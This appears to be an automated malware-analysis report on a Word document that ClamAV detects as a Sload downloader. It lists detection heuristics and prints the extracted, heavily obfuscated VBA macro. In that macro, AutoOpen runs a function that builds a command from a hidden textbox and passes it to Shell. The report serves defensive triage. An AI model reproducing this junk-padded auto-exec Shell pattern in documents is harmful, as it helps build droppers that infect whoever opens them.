MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The 'autoopen' macro is present and triggers the execution of a VBA function that includes calls to Shell(), indicating an attempt to run external commands. Heuristics also flag suspicious cmd.exe and PowerShell references, suggesting the macro is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786417-0' further supports this assessment.
Heuristics 10
-
ClamAV: Doc.Downloader.Sload-6786417-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6786417-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP) Select Case WobDQDQUjCLRikJVzhfX -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() fZfbF -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11572 bytes |
SHA-256: 5e0781f7ad1abe314cf155edc1fd6ae829aac77f03b6acd5b1ea27a790e8ef64 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
309 of 350 identifiers look randomly generated (e.g. 'ulFrjJiawUvPzmCLICQmvCGF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XTzcjasLs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
fZfbF
End Sub
Attribute VB_Name = "XrLnRQJJqddWhD"
Function fZfbF()
On Error Resume Next
Select Case wRJzodfHKzrHOzVitsKcmjq
Case 28336665
lIasjJamAJzkaMbQKocpI = jjRAzPQFRbEQDVEO
pRUNpXtTfjMbrNPabbr = Log(jMKVurWjJJGLwNmXnwq)
XjRjEiZNpqbtNnsd = 46042415
TwBNJWdAiibrmflfDCviRQRI = ThMwJUJQpdsKKXvCEzumzDw
Case 50705491
jqichDjsWqoQCVJSbzBtU = 297703414
zbMQWWsPkFPZianHZLRn = Log(GlCdlUWFuOOqLiBVmJWd)
DLmwirnqchCFwtpKmlB = 145760435
qqBjTsmmmBuJFCaQ = Log(GdjPSjLkMpLKAYVHQNUkN)
End Select
Set wAEpfIvsqPuEfYmu = JqwHDbbmdZCppFfUui
Select Case rKlFfCkcKIlcPtbJVtki
Case 79014147
LDOaYXmvwskuwqMGrNAR = QEiYIAGupWGQLziqEd
qPMtsUwlzOCXiuLu = Log(fCPXfAHViilqiQmjnbFELqDL)
JfmzbWzFjLCOpKOEX = 91561221
LuTwQnqSGqnowDHWUUWCIm = uEjVzRqzncNAVqhWLlDsO
Case 317626379
EKiotkBLiYJYtjSsBP = 284442662
LlDmjnwKREtWwi = Log(LPczOlRfbLRnptsBdXwK)
GwHGlqudfmaLBHdYS = 186196710
uFbaPAJRYCQzCXMET = Log(rduWBwYqbomOdLvhQN)
End Select
Set VsFcZVaOnYooCKDbzTXD = BYYUfJZFDUGzZzclAVBb
Select Case ulFrjJiawUvPzmCLICQmvCGF
Case 104852227
uSMRFMkBPditKuAUJSNXGs = icaQhDriAbtPQNh
jfwWYhOsWlbsossjB = Log(hoivCwYziSQfkGcD)
sKWjwOhuwbzqHjJNFfsk = 263917251
wwZDwbqAVQkPAZibkazB = WZJWiHRiajSpPLY
Case 65103670
RFDvGiFrjjjiuSmmWbZQjNU = 161900265
ujRakNGRrIrzLQqDfz = Log(izfRfCskztMDlfZLCoR)
VdNDJvpKLiMBNvpWPPlYsdGX = 208235592
GSmEnPNBCFlcHkN = Log(YQjKpppCwnCtGsWqXEoWY)
End Select
Set vzoMtkkmHAKJEqq = ORcjIANUvKjvFDwqJS
Select Case azCMNDccczNwALsCEC
Case 146960193
zaYhRLwsiqfYiSuHwY = ToWrOYCWqDAJWZw
zbVvBFkwlRpShQlGfu = Log(iciKIPpHpdjJwj)
vjadGOEYFwikoaRtdbXQsQQN = 211186359
zuUFIrljUFjCoodE = NaiAhXkChaPFfPNzuQKD
Case 3504904
qwEFMNbnjmnnDmBLQWkCaQ = 145312446
ppTFtXTAcYjjwcKXatrc = Log(sLavjAnTzNacaPWtW)
LTmKiDVOoLMchZtLwisJKXf = 217964709
LJDVModEAjJfhjWaUMbG = Log(jAjPTsBNjnoFfTuRtb)
End Select
Set jXjsjjOzWipLDaJfIUG = vcqQsUZCNcIbkEXzzIziEui
Select Case NGLGswtzPWjDDN
Case 317598670
zGAncwTzEjTmFYjCYPtiIo = CbJqrKVavHFbiZkY
nNCJfHsrqdinTRiKu = Log(MSHbniIXizzzdnrirumDXUQz)
jrmbqbQoaYFHLa = 134419769
HdtusArwoajYqb = BIbHrWvoXjICOlXfURDPqXF
Case 52043167
zqnPsrwzjEwkTddLpVNk = 326581122
KRuOGnLBiDTbrfIYfoK = Log(ihYvBoZEBBrXiX)
VVdlKnfZvRsmwCQqZZuu = 193603507
wNSNHzcLvsTAmDCDzQCHdiJ = Log(bBlLSwodCdWQSz)
End Select
Set jzjVzSzQNoVZdrVPUDQm = ORtzDqzJjlkCjVK
Select Case ERviYisJDiDkOHdirUMBQPV
Case 286766586
TWBGbltACXiKBiCilRjSaiY = pzZkWcowEnELqCcsKkMk
TpqJXfzoYQpwWRcMIdZjmGO = Log(qoipnIqSolVJjbwzqHf)
PNUlAjBGnBHNbQTjwI = 2945696
ZXKkvSchibsfbqKcT = pHHkfmdIiSIPAiHPzsDjphDU
Case 180962310
IclkGqPzStIpsXHn = 236601212
ZPaKXLtSZkHHDnIT = Log(BWwMRABPOHHAjcCztvMk)
EaqoQisKpVhYsFRlzHPZuJEl = 119558283
IFKKrwifzwHYAVIEYlabnWl = Log(vnzLEuVEVYWnAfdk)
End Select
Set NIUiZGtRplTLqFlTwODzXb = aCCcwVDsIplaOQ
Select Case DSoJVFwEIwcQrWZoOQlYD
Case 272940126
YMWSAThulQcSnqNhKuRnfl = jmzVzlPDfOcPwznwkaDr
ODmwAibdlBKnjpfCwhJVNzEK = Log(QiXwjMbucRiKXwDoZtM)
bNJHvmstVmRzcXjzD = 219496697
oitGYzrbjGhnErs = DZPBuTiYqAjizPDksoYjiHlK
Case 21949520
JnnzMHjYjanjKUAU = 106356873
NJbTDzvPTJQvnFzjKu = Log(qnbzbicwMiDiNrNwujqkq)
wnaIlmiiaKFjZj = 249589119
zlaAilQaCEZIDzTK = Log(mqoYTzpNdDsdiSiKjkFKpVLX)
End Select
Set FjNZibqunmszljnkmFiXzYmv = TPOAGRfQZNQcozcCiqflNwDR
Const nOBksY = 0
Select Case jmkuSDKWinznHrpAiTd
Case 136736458
PpmAvnRqvaYzmEjb = IAqjmjhiEUwQvV
pNQwzuWQsjjMaqUnFYcK = Log(iidFFRrSSazFtHYomdHm)
zzCXGsjhsrTKDKjmqsdiz = 171598839
jGjiwwTuUYrhiah = YIlZijvqzoBvliHnXsSRaJni
Case 169223328
wmLdELJuEWMAYDKqlHzXIqQE = 64828483
HQYPVCAkiJiTjpmrZlbXUP = Log(jYflCoHVHTTEsWp)
JAnVBLRXHkRRfd = 255107008
sJoqpRzwaoXAQluVj = Log(SXhtFYGHdRXqpijBLjhwL)
End Select
Set CqvNoRGVqwhvLPkwDQjinjZ = wtTPaKnkYaUqwskpBIbbJ
Select Case JMvSMWiWXMTkVwYRTkJUvti
Case 4011724
abOwUNiqBXSJfNhrjZALm = zzhFCTVzPiuhmv
ZDzltUZFHnXccOUhoz = Log(bQOPKPVEHoPwbmXGWBa)
farZRirsivwFiLUDKnoWXQR = 114039684
pvqFHzjOGuBYozjXdVMsJPP = TviMEUPIahcjBnazP
Case 286695508
QSiVqIwuuFZjZfYlMPU = 63169830
itwHUzWquOcRozzpasEGaV = Log(BwCDdCOivhplZj)
VLcEzqwRljYwlWPDL = 64498236
wIStsnjjjjwNaILWsdWVME = Log(RWEGcLfiicijFDRjQTKPh)
End Select
Set TwnazXZpoisbBXnhDUBFUl = ZGTbuGBBoAiDGSCLIEpnEri
Select Case cDLzjLRifaYwLuYmF
Case 236756876
WjFwXmhXqQwsvAL = zSdiHzBpAPnHmUbJ
GikXHoLznbNhhdwAjYUbBzYi = Log(vHzZlWpowoVbnsiSj)
WoHTmqHDvHhuJFFILh = 80035092
CFYsloaYvfqJSdCqHcV = ShahHBfPVihwGJR
Case 112505020
OhzPiHPRXcfDPAjLD = 47738957
iqlkILDQwtDILlasuX = Log(jaKQkYAMFiwkCCwmZdzoEfq)
XUTTSpIooKXuTaALI = 334873604
mAIAFPwAOzjoEjtsPEjtPWKw = Log(iCTzdmfFjERPTNETptqFWTK)
End Select
Set hlGcFiQpLIbMfBlLDiX = bdvrbaacTrVLstRsfDAw
Select Case QDVqAFjYWXCDNz
Case 14286292
WnwfEKQtURiiGAH = XqOwLjruqLhLjjIonasZwhz
mcViWESWQKfWlFv = Log(vDotdFKkJuqfHhvqtIKjNJ)
ltKvYElDhiFissEchSk = 161334711
OmPiOpdcvLZlfDzTKljY = IABDDzojdQdluXGvMKPHamT
Case 207200612
MoFJWhDAlFlNfLrpvSvwAkj = 294563860
zaRQQWhWKqIjXGjZkJR = Log(hjzXSfUXisbIMlYGmj)
jDrVUiGXLLXPbPXqRb = 302794474
kBJnSOAWmhcmBniRqKioMHIM = Log(cAsovHismlhtDDFh)
End Select
Set liikOohGzGwFlctzcpOIh = ZwuOBAXnHYGcWddaNLLivAh
Select Case AiCJorBXcXlodCzfUjlt
Case 126697762
zEqRhiraTOiQwNW = SWrpwoJtDYisYzc
MsizTWJXjBEWKMEkJORO = Log(dILvwOJzwCUlwE)
iYmvMUJwkmjqTuj = 67835953
NiikXCWIAYhzklLIwGkbW = jULbINYpEOrmXT
Case 145109486
GWPnMvbzzBXhVnziLM = 328240618
YwuJjKTTHzNsmczN = Log(joktObHpqUROJbLV)
zKcFDCcIpCnfvto = 248939544
cXMTJUmUtpCEwWBWdf = Log(lGfmIlZYUJvbcdmzoIonpp)
End Select
Set KMZDqjlJROzAQwlEikwSK = OZbMWNNprzvUVZihisiAiNdd
tHUaIkk = XTzcjasLs.TextBox1.Text + wAciJ + EGDtX + bWzEvaLV + pUJJinGY + aiEEi + DkKSB + CqdYa + iFCpnQuz + opOmsjt
Select Case tqmLIOtFdOQAZsRRjjRzjw
Case 159085602
zQwRAwwWPRCqsQpmmMGV = kkWGtwzbmGwRHLsS
FhStlIpbZPriMWqCROfa = Log(HzwvdLFYkFzTKHYD)
zcjiTiGwZjGPqwMsRw = 237351975
wHwjCpKtLCPSwzOCtj = OszEczIuIkasIokVsfzciY
Case 83763926
WToQshKzlKVbwCUjtvCJk = 67158936
dOcWWvDJqfOiILs = Log(aabHwTJWpLNijV)
AMMKCQLnDhAivk = 136693081
YBtcjJDIKFFjLiVa = Log(cNVvAplOnXZzoNlUzp)
End Select
Set ptUrJEAzKfbVLaJTXwQY = HNvldKWsULMtpkbH
Select Case UCwjPhzVnlQwZrjwhMk
Case 62701598
BCBoWPFlGkdmABomclEcCfv = nKYHwRtFTjTAuutR
khAmKYpsKFafhqVGnBLqwpp = Log(XSQiorhrmkSwuadljPmMSam)
wtGtiatusJOrIGESXiswXWM = 85009957
ZHiDcYzjWkvknJLrYGk = lddLTojhqWbjtVIT
Case 68157354
PlRLlWJhjZjEzQbAmwdXko = 266583239
qAIOrSArhhrzuarGC = Log(EKAlWLEsiMqmGawAVlOuqR)
oXSZcGMEXVzjdQFiwJw = 234869250
BubQCuFGsHvnlLNEmcmWHS = Log(IqSkQHRkrhkndqIZM)
End Select
Set wfOBwsErZKhLNjj = SZjJpwaWEFBYkNiCaOJn
Select Case wMPwcuYDHJVhbfoFDjfqiLfT
Case 206558303
YSkruTpwwFuIGwAGzloYthWY = BZjOkjwThWFTQOCrijjLv
hpcMufGCqwLIstGhNYwp = Log(bumjWmhOAnNnYsumYmR)
ifJHHWIlzSKNGCGv = 271974188
XtZnqJwVTBMupmjduvkf = AiwRhcAhWlwzvOYnrpA
Case 60365705
CGYCdXjdHKKKBXPcWIjwoz = 105311353
ztYIqDGkVowXXPEF = Log(EObnntrIKVjUKwEqLE)
zXmEEaoNYrFGEaikjoZKz = 214806972
fiZPLpthMKTGwRKWNzjSREOb = Log(jOVBlukSXHWiKcYfJtwkUhS)
End Select
Set SMLTOibTzWiaXjaPjnZ = nrCWImHLSqZwvwiZ
Select Case MXwJjKICkzRVbZuVhIXLChYB
Case 223978794
ZZFtLVWkRNCNMRDdYizws = iPPLOdsiwubwljwqnvwqHjT
wFIZIuClsjvqiAHtsm = Log(HlNjUjiqDzBlzwuPI)
TVEsqFEoGMnoFwURLi = 229534311
osaDwnruzujkwYYQKPv = bfaWDPsDQfkMjjh
Case 173519319
AuCOJqMcCpjZDHwnazISEAi = 308565788
dRJXEPrwVKVttRpNtAaLiN = Log(nYFlYHqzLHajYCFwZpa)
wbuhjSFLzIiJQsWwwiSqf = 70441711
lSlQKoBAWDfcLdYF = Log(CizDYRPfjGAuXjB)
End Select
Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD
BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP)
Select Case WobDQDQUjCLRikJVzhfX
Case 35180200
kZkdXKsiXLpdjafPjqHMPF = ElpFINBuwXfDCSnjGbCfA
BEiqhzoQtaisfrhFkQW = Log(sFAXcwwKAkNajcklW)
fDFjiFYKmvwBrlIkj = 318342455
LNlBiQIMELDHvi = kTKMauwSJAMwtbRwt
Case 262077770
LEuBbPWtUwjoCSYBpZWVI = 86534094
cBRROkmOJTNXOqRiwEBdUZL = Log(jUabWWSazJRAJwHI)
jZUovKLYraRGjaDpIluKK = 290469863
BnZFYRYzztvkzrVkKODfvA = Log(OiOLBMMzXrmTBVFmHS)
End Select
Set UMnpDwmAkwHMrATLWKFW = kwYtMXTPEbwMSjHasKMOM
Select Case QawqLwTlvbzjFiWzVZFbIoT
Case 190393607
HiZWhfKUQjwXVZjjHM = KPCjuFQjPXmcGTWDOtPOwmLo
YbzzZvAcWSFEwfQQwuwdHrD = Log(WSnrzAXDOoVdRjqclzjAQwPO)
zzsPKnhXzdGIJiWvCqJJmzRE = 132091822
HHDiXDZsADfoDBoGRDkUcVN = OIGEMwfnvSfZURG
Case 20953660
RdTQOnHVjhOUzQmuzTOzU = 205263489
XrskWOlAzjlKru = Log(AVwijRRTvCsiXzrGOmcvYV)
lGujRnOFvAIStz = 249792918
kGXzidkODFaXYPwQfSMcllAj = Log(wziPizHcnrpBXTHWjcLMr)
End Select
Set fBrnbmJMwFrPlfFzZITuk = JPIwEGFIpTqPRcXrWU
Select Case OQPLbImPzvZbrLQUE
Case 94400184
TdQXwVrbiKqwCcjkAC = rGSTfGWKlAjoHzATmwt
pjjIEIzWzLaQRdXNAK = Log(QaLGbzWiwBItlGjkHZKOW)
zKZZQXdcmScOdsic = 36354091
iZwUqRoJhtPoqvOG = AjBjwFVOpRXdrGiUwfw
Case 71022157
UIlGpkNwcjAWQiwEijUd = 40476887
zQjqmkUrPRvzjY = Log(ZJVIQNlXGbciPUwch)
TIUawzcilQiaTzYoFZw = 140253874
nOtaPKCEXTpOYNPvzKYflb = Log(pfHiKaOWdMifubzjma)
End Select
Set OzsMukItGPapELtEuHj = dIwMCqhVUzblFMNXwTNtBhI
Select Case tmPTCTmiMNnFUQtU
Case 253541542
SWiLFNjkdwfCFsjWsMMq = FTSEOCTkVhZjiRZhihB
RppCJIuYwYhHvCMCMHqLQ = Log(HOGWabGpKfLHJQ)
QuGHulzARlbEXVaqpTRh = 176400183
niTRJOCwoswXwNkDVOKOplwW = TjoVnsjDUHXoccjwUwjHz
Case 163724978
GlzCWMGCjwipiNaB = 149075
UbGMPtmbPUoPOjvW = Log(kpqMqNEnrtmEktvjuiwGt)
EQvwlNUiwuIjqLJBdO = 8553705
YzzXfatjUEwPnOlaQuc = Log(TJvrwEDjZtBiFUzFQYRLUoN)
End Select
Set wsscajkjmKGODIbaXJGbDPJ = QfKscQWivBvDLbJpIR
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.